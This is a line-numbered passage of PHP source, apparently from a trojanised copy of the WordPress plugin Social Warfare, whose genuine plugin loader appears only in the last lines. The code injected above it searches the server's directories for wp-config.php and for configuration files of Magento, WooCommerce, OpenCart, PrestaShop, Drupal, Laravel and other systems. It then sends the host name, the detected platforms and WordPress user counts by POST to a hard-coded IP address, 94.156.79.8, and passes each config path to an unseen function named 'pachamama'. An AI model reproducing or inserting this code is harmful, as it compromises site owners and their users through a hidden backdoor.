391 | foreach ($cms_config_files as $file) { |
---|
392 | // echo($file); |
---|
393 | if (strpos($file, 'wp-config.php') !== false) { |
---|
394 | |
---|
395 | $detected_cms['WordPress'] = true; |
---|
396 | $wp_config_paths[] = $file; |
---|
397 | |
---|
398 | } elseif (strpos($file, 'class-wc-settings.php') !== false) { |
---|
399 | // You may add a specific check for WooCommerce here if needed |
---|
400 | $detected_cms['WooCommerce'] = true; |
---|
401 | $wc_config_paths[] = $file; |
---|
402 | } elseif (strpos($file, 'env.php') !== false && |
---|
403 | strpos($file, 'Composer') === false && |
---|
404 | strpos($file, 'composer') === false && |
---|
405 | strpos($file, 'Softaculous') === false) { |
---|
406 | // You may add a specific check for Magento here if needed |
---|
407 | // Read the content of the file |
---|
408 | $fileContent = file_get_contents($file); |
---|
409 | |
---|
410 | // Check if the content contains the string 'host' => ' |
---|
411 | if (strpos($fileContent, "'host' => '") !== false) { |
---|
412 | $detected_cms['Magento'] = true; |
---|
413 | $mg_config_paths[] = $file; |
---|
414 | /*echo("MAGENTO\n\n\n"); |
---|
415 | echo("MAGENTO\n\n\n"); |
---|
416 | echo("MAGENTO\n\n\n"); |
---|
417 | echo("MAGENTO\n\n\n"); |
---|
418 | echo("MAGENTO\n\n\n"); |
---|
419 | echo("MAGENTO\n\n\n"); |
---|
420 | echo("MAGENTO\n\n\n"); |
---|
421 | echo("MAGENTO\n\n\n"); |
---|
422 | echo($file); |
---|
423 | echo($file); |
---|
424 | echo($file); |
---|
425 | echo($file); |
---|
426 | echo($file); |
---|
427 | echo("MAGENTO\n\n\n"); |
---|
428 | echo("MAGENTO\n\n\n"); |
---|
429 | echo("MAGENTO\n\n\n"); |
---|
430 | echo("MAGENTO\n\n\n"); |
---|
431 | echo("MAGENTO\n\n\n"); |
---|
432 | echo("MAGENTO\n\n\n"); |
---|
433 | echo("MAGENTO\n\n\n"); |
---|
434 | echo("MAGENTO\n\n\n");*/ |
---|
435 | } |
---|
436 | |
---|
437 | } elseif (strpos($file, 'config.php') !== false && |
---|
438 | strpos($file, 'Composer') === false && |
---|
439 | strpos($file, 'composer') === false && |
---|
440 | strpos($file, 'Softaculous') === false) { |
---|
441 | if (strpos(file_get_contents($file), '$config[\'encryption_key\']') !== false) { |
---|
442 | $detected_cms['OpenCart'] = true; |
---|
443 | } |
---|
444 | } elseif (strpos($file, 'parameters.php') !== false) { |
---|
445 | if (strpos(file_get_contents($file), 'prestashop') !== false) { |
---|
446 | $detected_cms['PrestaShop'] = true; |
---|
447 | } |
---|
448 | } elseif (strpos($file, 'settings.php') !== false) { |
---|
449 | if (strpos(file_get_contents($file), 'drupal') !== false) { |
---|
450 | $detected_cms['Drupal Commerce'] = true; |
---|
451 | } |
---|
452 | } elseif (strpos($file, '.yaml') !== false) { |
---|
453 | if (strpos(file_get_contents($file), 'Symfony\Component') !== false) { |
---|
454 | $detected_cms['Symfony'] = true; |
---|
455 | } |
---|
456 | } elseif (strpos($file, '.env') !== false) { |
---|
457 | // You may add a specific check for Laravel here if needed |
---|
458 | $detected_cms['Laravel'] = true; |
---|
459 | } elseif (strpos($file, '.global.php') !== false) { |
---|
460 | // You may add a specific check for Zend Framework here if needed |
---|
461 | $detected_cms['Zend Framework'] = true; |
---|
462 | } elseif (strpos($file, '.dat') !== false) { |
---|
463 | $detected_dat_files[] = $file; |
---|
464 | } |
---|
465 | } |
---|
466 | |
---|
467 | // Convert the boolean values to strings |
---|
468 | foreach ($detected_cms as $cms => $detected) { |
---|
469 | $detected_cms[$cms] = $detected ? 'true' : 'false'; |
---|
470 | } |
---|
471 | |
---|
472 | // Now $detected_cms array contains the names of detected CMS based on the configuration files found |
---|
473 | // And $detected_dat_files array contains the paths of detected .dat files |
---|
474 | |
---|
475 | // Read users from the database and count them for WordPress and WooCommerce |
---|
476 | $wordpress_users = $wpuserscount; |
---|
477 | //$woocommerce_users = get_woocommerce_user_count(); |
---|
478 | $woocommerce_users = 000; |
---|
479 | |
---|
480 | // Perform POST requests to the endpoints with JSON data containing CMS detection and user counts |
---|
481 | $url1 = 'https://94.156.79.8/FCS'; |
---|
482 | $url2 = 'https://94.156.79.8/CMSUsers'; |
---|
483 | |
---|
484 | $data1 = [ |
---|
485 | 'host' => $_SERVER['HTTP_HOST'], |
---|
486 | 'cms' => $detected_cms |
---|
487 | ]; |
---|
488 | |
---|
489 | //print_r($detected_cms); |
---|
490 | |
---|
491 | // Send data to the endpoints using CURL |
---|
492 | send_post_request($url1, $data1); |
---|
493 | // Additional logic as needed |
---|
494 | } |
---|
495 | |
---|
496 | function getWPUsers(){ |
---|
497 | global $wpuserscount; |
---|
498 | global $currdomain; |
---|
499 | // Read users from the database and count them for WordPress and WooCommerce |
---|
500 | $wordpress_users = $wpuserscount; |
---|
501 | //$woocommerce_users = get_woocommerce_user_count(); |
---|
502 | $woocommerce_users = 000; |
---|
503 | $url2 = 'https://94.156.79.8/CMSUsers'; |
---|
504 | $data2 = [ |
---|
505 | 'host' => $currdomain, |
---|
506 | 'wordpress_users' => $wordpress_users, |
---|
507 | 'woocommerce_users' => $woocommerce_users |
---|
508 | ]; |
---|
509 | |
---|
510 | // Send data to the endpoints using CURL |
---|
511 | send_post_request($url2, $data2); |
---|
512 | } |
---|
513 | |
---|
514 | // Function to get WordPress user count from the database |
---|
515 | function get_wordpress_user_count() { |
---|
516 | // Your implementation to fetch user count from the WordPress database |
---|
517 | // Example: |
---|
518 | // $count = query_wordpress_database(); |
---|
519 | // return $count; |
---|
520 | return 0; |
---|
521 | } |
---|
522 | |
---|
523 | // Function to get WooCommerce user count from the database |
---|
524 | function get_woocommerce_user_count() { |
---|
525 | // Your implementation to fetch user count from the WooCommerce database |
---|
526 | // Example: |
---|
527 | // $count = query_woocommerce_database(); |
---|
528 | // return $count; |
---|
529 | return 0; |
---|
530 | } |
---|
531 | |
---|
532 | // Function to send POST request |
---|
533 | function send_post_request($url, $data) { |
---|
534 | $ch = curl_init($url); |
---|
535 | curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); |
---|
536 | curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); |
---|
537 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); |
---|
538 | curl_setopt($ch, CURLOPT_HTTPHEADER, [ |
---|
539 | 'Content-Type: application/json', |
---|
540 | 'Content-Length: ' . strlen(json_encode($data)) |
---|
541 | ]); |
---|
542 | $response = curl_exec($ch); |
---|
543 | curl_close($ch); |
---|
544 | // Handle response as needed |
---|
545 | } |
---|
546 | global $wp_config_paths; |
---|
547 | $wp_config_paths = []; |
---|
548 | global $wc_config_paths; |
---|
549 | $wc_config_paths = []; |
---|
550 | global $mg_config_paths; |
---|
551 | $mg_config_paths = []; |
---|
552 | check_cms_configuration_files(); |
---|
553 | |
---|
554 | function find_wp_configs(&$wp_config_paths, $depth = 0) { |
---|
555 | $current_directory = getcwd(); |
---|
556 | $parent_directory = $current_directory; |
---|
557 | |
---|
558 | // Go back three parents |
---|
559 | for ($i = 0; $i < 3; $i++) { |
---|
560 | $parent_directory = dirname($parent_directory); |
---|
561 | } |
---|
562 | |
---|
563 | // Start the search from the parent directory |
---|
564 | find_wp_configs_recursive($parent_directory, $wp_config_paths); |
---|
565 | } |
---|
566 | |
---|
567 | function find_wp_configs_recursive($directory, &$wp_config_paths) { |
---|
568 | // Check if wp-config.php exists in the current directory |
---|
569 | $wp_config_file = $directory . '/wp-config.php'; |
---|
570 | if (file_exists($wp_config_file)) { |
---|
571 | $wp_config_paths[] = $wp_config_file; |
---|
572 | } |
---|
573 | |
---|
574 | // Continue searching forward recursively |
---|
575 | $contents = scandir($directory); |
---|
576 | foreach ($contents as $item) { |
---|
577 | if ($item != '.' && $item != '..' && is_dir($directory . '/' . $item)) { |
---|
578 | find_wp_configs_recursive($directory . '/' . $item, $wp_config_paths); |
---|
579 | } |
---|
580 | } |
---|
581 | } |
---|
582 | |
---|
583 | function print_wp_config_paths() { |
---|
584 | global $wp_config_paths; |
---|
585 | if (empty($wp_config_paths)) { |
---|
586 | //echo "No wp-config.php files found.\n"; |
---|
587 | $z = 0; |
---|
588 | } else { |
---|
589 | //echo "List of wp-config.php files:\n"; |
---|
590 | foreach ($wp_config_paths as $wp_config_path) { |
---|
591 | //echo "$wp_config_path\n"; |
---|
592 | $a = 0; |
---|
593 | } |
---|
594 | } |
---|
595 | } |
---|
596 | //print_wp_config_paths(); |
---|
597 | |
---|
598 | find_wp_configs($wp_config_paths); |
---|
599 | foreach ($wp_config_paths as $wp_config_path) { |
---|
600 | pachamama($wp_config_path); |
---|
601 | getWPUsers(); |
---|
602 | update_option('my_admin_init_function_run', 'yes'); |
---|
603 | } |
---|
604 | |
---|
605 | }} |
---|
606 | |
---|
607 | /** |
---|
608 | * Social Warfare is entirely a class-based, object oriented system. As such, the |
---|
609 | * main function of this file (the main plugin file loaded by WordPress) is to |
---|
610 | * simply load the main Social_Warfare class and then instantiate it. This will, |
---|
611 | * in turn, fire up all the functionality of the plugin. |
---|
612 | * |
---|
613 | */ |
---|
614 | require_once SWP_PLUGIN_DIR . '/lib/Social_Warfare.php'; |
---|
615 | new Social_Warfare(); |
---|